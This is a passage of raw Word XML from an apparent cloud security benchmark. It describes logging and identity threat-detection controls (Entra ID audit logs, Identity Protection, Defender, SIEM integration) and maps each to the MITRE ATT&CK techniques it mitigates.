        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B123CA">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D0EC28" w14:textId="5816168A" w:rsidR="002C28FE" w:rsidRDefault="002C28FE" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002C28FE">
        <w:t>use alternate authentication material (T1550.001) passing tokens or session credentials to access additional cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6CD8F" w14:textId="5E8DF9B0" w:rsidR="00E829AF" w:rsidRDefault="00E829AF" w:rsidP="00E829AF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E829AF">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>LT-2.1: Enable Microsoft Entra ID threat detection and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2321D7F4" w14:textId="611B480B" w:rsidR="00E829AF" w:rsidRDefault="00E829AF" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E829AF">
        <w:t>Establish comprehensive visibility into identity and authentication activities by enabling audit logging and sign-in monitoring for all identity resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339ECEBB" w14:textId="05B380EA" w:rsidR="00E829AF" w:rsidRDefault="00E829AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E829AF">
        <w:t>Enable comprehensive audit logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C19D8A" w14:textId="40325CEA" w:rsidR="00E829AF" w:rsidRDefault="00E829AF" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E829AF">
        <w:t>Activate Microsoft Entra audit logs to provide complete traceability for all changes made to identity resources including user and group management, role assignments, application registrations, and policy modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510CBCE9" w14:textId="79BFD683" w:rsidR="00E829AF" w:rsidRDefault="00E829AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E829AF">
        <w:t>Monitor authentication activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307A6137" w14:textId="3560E547" w:rsidR="00E829AF" w:rsidRDefault="00E829AF" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E829AF">
        <w:t>Track sign-in reports to capture all authentication events for managed applications and user accounts, establishing baselines for normal access patterns and identifying anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C013E6" w14:textId="415A11EC" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Detect risky sign-in patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F1651" w14:textId="5D88E8CC" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Enable monitoring of risky sign-ins to flag authentication attempts from suspicious sources, impossible travel scenarios, unfamiliar locations, or leaked credential usage indicating potential account compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A75D1" w14:textId="526800DB" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Identify compromised accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0236A0" w14:textId="0B3E7ED3" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:lastRenderedPageBreak/>
        <w:t>Monitor users flagged for risk to detect accounts showing multiple risk indicators requiring immediate investigation and remediation through automated or manual review workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07463D79" w14:textId="6B9DF25F" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Integrate with SIEM platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B6ADDB" w14:textId="3BA9F39A" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Route Microsoft Entra ID logs to Azure Monitor, Microsoft Sentinel, or third-party SIEM platforms for advanced correlation, long-term retention, and cross-domain threat detection analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A040C7E" w14:textId="253144F6" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00F62DE7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>LT-2.2: Implement identity protection and risk-based controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA98801" w14:textId="1758D163" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Enhance identity monitoring with advanced risk detection, adaptive access controls, and AI-powered investigation capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AB9CA7" w14:textId="1AEC2C04" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Deploy identity risk detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400EB7E7" w14:textId="5ACC9827" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Enable Microsoft Entra ID Protection to detect and remediate identity risks including leaked credentials, sign-ins from anonymous IP addresses, malware-linked sources, and password spray attacks using machine learning and threat intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DDB05" w14:textId="6062DC63" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Implement risk-based access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62976D75" w14:textId="3462F8FB" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Configure Identity Protection policies to enforce adaptive authentication requirements through Microsoft Entra Conditional Access, requiring MFA for medium-risk sign-ins and blocking high-risk authentication attempts until remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110F670" w14:textId="4EE0C9DC" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Monitor cloud infrastructure identity threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A5784" w14:textId="10CDA177" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Enable Microsoft Defender for Cloud workload protection to detect suspicious identity activities including deprecated account usage, excessive failed authentication attempts, and anomalous service principal behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1EC9AC" w14:textId="340B7384" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Extend to hybrid environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA6449" w14:textId="18526589" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>For organizations with on-premises Active Directory, deploy Microsoft Defender for Identity to monitor domain controllers, detect advanced threats, identify compromised identities, and investigate malicious insider actions spanning hybrid infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE7E19" w14:textId="469176AB" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Accelerate investigations with AI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286E04A" w14:textId="31EBF914" w:rsidR="00F62DE7" w:rsidRDefault="00F62DE7" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F62DE7">
        <w:t>Leverage Microsoft Security Copilot to reduce investigation time through natural language queries, automated threat analysis, guided remediation workflows, and AI-powered correlation of identity signals across Microsoft Defender XDR, Sentinel, and Entra ID Protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA22A62" w14:textId="732D1CB1" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="007A544F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc242449526"/>
      <w:r w:rsidRPr="007A544F">
        <w:lastRenderedPageBreak/>
        <w:t>Enable comprehensive logging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="74B664C8" w14:textId="65F7F404" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="007A544F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc242449527"/>
      <w:r w:rsidRPr="007A544F">
        <w:t>LT-3: Enable logging for security investigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="1ACDD3AD" w14:textId="01378344" w:rsidR="007A544F" w:rsidRDefault="007A544F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B2261C" w14:textId="4BBDA68E" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Enable audit logging across data plane operations, control plane activities, and identity events to support incident investigation, forensic analysis, and compliance validation. Comprehensive logging provides the evidence trail required to reconstruct security incidents and determine breach scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFB38FA" w14:textId="2F7DE032" w:rsidR="007A544F" w:rsidRDefault="007A544F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A544F">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4CA207F6" w14:textId="300582F6" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Forensic blind spots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F875C58" w14:textId="117727FD" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Incident responders cannot determine what was accessed, modified, or deleted during a breach because resource-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A544F">
        <w:t>level data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A544F">
        <w:t xml:space="preserve"> plane operations (key vault access, database queries, storage reads) are not logged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485EA18A" w14:textId="45693AD7" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Management plane opacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20502F0C" w14:textId="374909C7" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Infrastructure changes (role assignments, firewall rule modifications, resource deletions) proceed without audit trails, preventing attribution of malicious or negligent administrative actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575736B5" w14:textId="6AAD51DE" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Impossible attribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3894EE" w14:textId="6C9D6447" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Security teams cannot identify which identity performed suspicious actions, from what IP address, at what time, or using which authentication method absent comprehensive Microsoft Entra ID logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0CB2B4" w14:textId="29CF086F" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Lateral movement invisibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764AF798" w14:textId="7C36056B" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t xml:space="preserve">Attackers pivot across resources (VM to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A544F">
        <w:t>storage to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A544F">
        <w:t xml:space="preserve"> database) without leaving investigable breadcrumbs because cross-service activity correlation lacks audit data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67409A52" w14:textId="3A3B32EF" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Compliance failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E439D23" w14:textId="0079B4EA" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Regulatory frameworks (PCI-DSS, HIPAA, SOC 2) mandate detailed audit trails for all data access and administrative actions—absent logging creates demonstrable compliance gaps and audit findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2AF80" w14:textId="446759FD" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Extended dwell time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA2D837" w14:textId="0AABBA18" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t xml:space="preserve">Without comprehensive logs, security teams discover breaches only after external notification (customer complaints, regulatory disclosure) rather than through internal monitoring—increasing average dwell time from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A544F">
        <w:t>days</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A544F">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A544F">
        <w:t>months</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A544F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D99915E" w14:textId="4FA98004" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:t>Root cause ambiguity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2159CB1D" w14:textId="79E4087F" w:rsidR="007A544F" w:rsidRDefault="007A544F" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="007A544F">
        <w:lastRenderedPageBreak/>
        <w:t>Post-incident reviews cannot determine initial access vector, privilege escalation path, or lateral movement sequence without complete audit trails spanning identity, network, and data planes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075890CF" w14:textId="3211C34F" w:rsidR="007F1CBE" w:rsidRDefault="007F1CBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1CBE">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04036EC3" w14:textId="5CBC80A6" w:rsidR="007F1CBE" w:rsidRDefault="007F1CBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1CBE">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF9F29F" w14:textId="4C13816F" w:rsidR="00303008" w:rsidRDefault="00303008" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00303008">
        <w:t>mpair defenses (T1562.008) disabling or modifying logging configurations to operate in monitoring blind spots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A463F" w14:textId="63A83AB2" w:rsidR="007F1CBE" w:rsidRDefault="007F1CBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1CBE">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FAA3B4" w14:textId="127C16FE" w:rsidR="00303008" w:rsidRDefault="00303008" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00303008">
        <w:t>indicator removal (T1070) deleting or manipulating logs to remove evidence of malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EEFEC7" w14:textId="55B21B15" w:rsidR="007F1CBE" w:rsidRDefault="007F1CBE" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007F1CBE">
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EBD440" w14:textId="6D0E36E6" w:rsidR="00303008" w:rsidRDefault="00303008" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00303008">
        <w:t>cloud</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00303008">
        <w:t xml:space="preserve"> infrastructure discovery (T1580) enumerating resources, permissions, and configurations to map the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244115B0" w14:textId="5B2134BC" w:rsidR="007F1CBE" w:rsidRDefault="007F1CBE" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007F1CBE">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145E520F" w14:textId="0A0614B2" w:rsidR="00303008" w:rsidRDefault="00303008" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00303008">
        <w:t>data from cloud storage (T1530) accessing sensitive data without data plane logging to track reads, downloads, or transfers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C98320" w14:textId="16366EF7" w:rsidR="007F1CBE" w:rsidRDefault="007F1CBE" w:rsidP="00B7417F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007F1CBE">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361188AA" w14:textId="2F5D450D" w:rsidR="00303008" w:rsidRDefault="00303008" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00303008">
        <w:t>exfiltration over web service (T1567) extracting data through cloud APIs where transaction logging is disabled or incomplete.</w:t>
      </w:r>
    </w:p>
